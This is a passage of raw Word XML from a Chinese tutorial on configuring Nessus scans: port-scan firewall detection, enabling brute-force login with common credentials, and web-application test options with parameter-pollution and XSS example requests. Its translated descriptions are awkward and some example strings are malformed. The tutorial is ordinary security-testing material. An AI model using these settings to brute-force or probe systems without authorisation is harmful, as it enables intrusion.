          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48297617" wp14:editId="79A43B33">
            <wp:extent cx="5216055" cy="3227705"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="77" name="图片 77" descr="D:\QQ消息\408122431\Image\C2C\45{QZ6LT8SRF~AW3OJ~%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QQ消息\408122431\Image\C2C\45{QZ6LT8SRF~AW3OJ~%8)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0549" cy="3236674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4）在点击打开DISCOVERY——</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ort</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，使能Over</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>ride automatic firewall detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项用来配置检测扫描仪与扫描对象之间是否有防火墙，可选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aggressive</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>detection选项，将尝试在端口扫描时使用对应的插件进行扫描，即使扫描的端口是关闭的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C80147B" wp14:editId="489E7D63">
            <wp:extent cx="5224007" cy="3884492"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="78" name="图片 78" descr="D:\QQ消息\408122431\Image\C2C\)1V5BNJII6BG(5V}~XL66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QQ消息\408122431\Image\C2C\)1V5BNJII6BG(5V}~XL66X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40561" cy="3896801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5）点击打开ASSESSMENT——</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，去勾选On</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>ly use credentials provided by the user</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的选项，这样nessus会尝试常用的用户名和密码去对目标系统进行暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033D1C7B" wp14:editId="5A7A422B">
            <wp:extent cx="5228061" cy="2520564"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79" name="图片 79" descr="D:\QQ消息\408122431\Image\C2C\(28FN2TVM$9NQ~CKPF[L6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QQ消息\408122431\Image\C2C\(28FN2TVM$9NQ~CKPF[L6CW.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45071" cy="2528765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6）如果扫描对象是WEB应用，可以在配置时使能Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>applications的扫描选项，并按需配置需要扫描的站点地址和对应的扫描配置，如下图所示，扫描配置说明如下表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F496143" wp14:editId="5D251890">
            <wp:extent cx="5205486" cy="3291675"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="80" name="图片 80" descr="D:\QQ消息\408122431\Image\C2C\GSC{P4{{17W)UU[REZ}C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QQ消息\408122431\Image\C2C\GSC{P4{{17W)UU[REZ}C3}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6489" cy="3304956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732C2241" wp14:editId="7F2AFE90">
            <wp:extent cx="5279666" cy="5136189"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="81" name="图片 81" descr="D:\QQ消息\408122431\Image\C2C\`C~7NC6[4BCH45XXH_91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QQ消息\408122431\Image\C2C\`C~7NC6[4BCH45XXH_918D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00262" cy="5156225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694"/>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="2306"/>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5303"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="110"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>选项</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="134"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>En</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t>able generic Web application test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用下面列出的选项。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="236"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>Abort web application tests if HTTP login fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> Nessus </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无法登录到目标通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> HTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，那么请不要运行任何</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序测试。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="845"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>Try all HTTP methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>默认情况下，</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve">Nessus </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将仅在测试使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> GET </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求。此选项会指示</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> Nessus </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也增强了对</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>窗体检测使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve">"POST </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。默认情况下，</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve">web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序测试将仅使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> GET </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求，除非启用了此选项。一般来说，更复杂的应用程序使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> POST </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法，当用户提交到应用程序的数据。此设置提供了更全面的测试，但可能会大大增加所需的时间。选中后，</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve">Nessus </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将测试每个脚本</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量与</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> GET </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> POST </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="667"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>Attempt HTTP Parameter Pollution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序测试时，试图绕过任何过滤机制注入一个变量同时提供有效含同一变量的内容。例如，正常的</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入测试可能看起来像</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>"/target.cgi?a= &amp; b = 2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。与</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> HTTP </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>参数污染</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t>HPP</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用，该请求可能看起来像</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t>"/target.cgi?a= &amp; = 1 &amp; b = 2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve">Test embedded web servers </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>嵌入式的</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器通常是静态的并且包含没有可定制的</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> CGI </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本。此外，嵌入式的</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器可能容易崩溃或成为非响应性扫描时。站得住脚的建议扫描嵌入式</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器分别从其他</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> web </w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器使用此选项。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:t>Test more than one parameter at a time per form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>此选项管理 HTTP 请求中使用的参数值的组合。默认情况下，如果没有选中此选项，正在测试一个参数攻击字符串，一次没有尝试"非攻"变体的附加参数。例如，Nessus 会尝试"/test.php?arg1=XSS &amp; b = 1 &amp; c = 1"在哪里"b"和</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>"c"允许其他的值，而无需测试的每个组合。这是最快的方法的测试与最小生成的结果集。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>此下拉有三个选项：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试随机对参数— — 这种形式的测试将随机检查随机成对的参数组合。这是最快的方法来测试多个参数。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试所有成对的参数 （慢） — — 这种形式的测试是速度稍慢，但比"一价值"都测试效率更高。</w:t>
            </w:r>
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>同时测试多个参数，它将测试一个攻击字符串，对于单变量的变化和所有其他变量，然后使用第一个值。Nessus 会尝试为例，"/test.php?a=XSS &amp; b = 1 &amp; c = 1、 d = 1"，然后在循环变量的这样一个人给出了攻击字符串、 一个循环通过所有可能的值 （如在镜像过程中发现） 和任何其他变量给出的第一个值。在这种情况下，Nessus 永远不会为测试"/test.php?a=XSS &amp; b = 3 c = 3 d = 3"当每个变量的第一个值为"1"。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试随机组合的三个或多个参数 （较慢） -这种形式的测试将随机检查三个或更多参数的组合。这是比测试的参数仅对更为彻底。注意增加组合三个或更多会增加 web 应用程序测试时间。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试的参数 （慢） 的所有组合— — 这种测试方法会攻击字符串与有效的输入变量的所有可能组合的完全详尽都测试。凡"全双"测试旨在创建一个较小的数据集作为折衷的速度，"所有组合"的在时间上的不妥协，并使用一套完整的数据的测试。这种测试方法可能需要很长的时间才能完成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:lastRenderedPageBreak/>
              <w:t>Do not stop after the first flaw is found per web page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5303" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>此选项确定当一个新的缺陷有针对性的。这适用于脚本的水平 ；找到一个 XSS 缺陷不会禁用搜索 SQL 注入或头注入，但你会对一个给定的端口，有顶多一报告为每个类型，除非设置了"全面测试"。请注意几个相同的类型 （例如，XSS、 SQLi 等） 的缺陷的报告可能有时候，如果他们遇上了同样的攻击。下拉型有四个选项： 停止后每个 web 服务器 （最快） 发现了一个缺陷— — 尽快缺陷发现在 web 服务器上的一个脚本，Nessus 停止并切换到另一个 web 服务器的不同端口上。 Nessus停止后，每个参数 （慢） 发现了一个缺陷— — 尽快在 CGI （例如，XSS） 参数中发现了一种类型的缺陷，切换到下一个参数的相同的 CGI 或下一个已知的 CGI，或每个服务器的端口下。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00A749FC">
            <w:r w:rsidRPr="00917920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>寻找所有缺陷 （慢） — — 执行全面的测试，无论发现的缺陷。此选项可以生成一个非常详细的报告，并不推荐在大多数情况下。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="502"/>
        </w:trPr>
